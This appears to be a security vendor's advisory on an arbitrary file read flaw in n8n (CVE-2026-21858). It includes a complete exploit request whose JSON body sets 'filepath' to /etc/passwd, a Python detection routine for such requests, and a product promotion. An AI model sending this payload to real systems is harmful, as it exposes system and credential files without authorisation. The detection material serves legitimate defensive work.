n8n (Ni8mare) Content-Type Confusion - Arbitrary File Read (CVE-2026-21858)
- Dee Sehejpal BSc (HONS)

Application Details
n8n is a powerful, open-source workflow automation tool that lets you visually connect applications, APIs, and data to automate repetitive tasks, acting as a "digital assistant" for business processes.
Vulnerability
n8n is vulnerable to an arbitrary file read attack where an attacker could potentially access files through execution of certain form-based workflows.
Identification
A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system.
POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d
{
  "files": {
    "field-0": {
      "filepath": "/etc/passwd",
      "originalFilename": "product-spec.pdf",
      "mimeType": "text/plain",
      "extension": ""
    }
  },
  "data": [
    "not really important"
  ],
  "executionId": "not really important"
}
Detection
By turning this into a traffic file and matching rule, we are able to detect arbitrary file read attempts to the application.
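One way to express that matching logic for offline review of captured requests, as an added example that is not Idappcom's signature or traffic file. The function name, the Host and Content-Type headers and the multipart sample are constructed assumptions; it also assumes legitimate form submissions arrive as multipart/form-data, so a JSON body that sets its own "filepath" is the anomaly.

```python
import json

# Constructed sample traffic. The JSON body mirrors the request shown above;
# the Host and Content-Type headers are assumptions, not taken from the page.
SUSPICIOUS = (
    b"POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d HTTP/1.1\r\n"
    b"Host: n8n.example\r\nContent-Type: application/json\r\n\r\n"
    b'{"files": {"field-0": {"filepath": "/etc/passwd", '
    b'"originalFilename": "product-spec.pdf", "mimeType": "text/plain", '
    b'"extension": ""}}, "data": ["x"], "executionId": "x"}'
)
# Constructed example of an ordinary browser upload to the same form.
BENIGN = (
    b"POST /form/82848bc4-5ea2-4e5a-8bb6-3c09b94a8c5d HTTP/1.1\r\n"
    b"Host: n8n.example\r\n"
    b"Content-Type: multipart/form-data; boundary=XX\r\n\r\n"
    b'--XX\r\nContent-Disposition: form-data; name="field-0"; '
    b'filename="product-spec.pdf"\r\nContent-Type: application/pdf\r\n\r\n'
    b"%PDF-1.4 constructed\r\n--XX--\r\n"
)

def client_supplied_filepaths(raw: bytes) -> list:
    """Return every files.<field>.filepath value set by the request body itself."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(request_line) < 2 or request_line[0] != "POST":
        return []
    if not request_line[1].startswith("/form/"):
        return []
    try:
        doc = json.loads(body)
    except ValueError:
        return []  # multipart or other non-JSON body: not this pattern
    files = doc.get("files") if isinstance(doc, dict) else None
    if not isinstance(files, dict):
        return []
    # A server-side upload parser normally assigns filepath; a client never should.
    return [f["filepath"] for f in files.values()
            if isinstance(f, dict) and isinstance(f.get("filepath"), str)]

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        hits = client_supplied_filepaths(raw)
        print(name, "ALERT" if hits else "ok", hits)
```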
Coverage
Idappcom have created signature 8026715 along with a traffic file for this vulnerability.
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional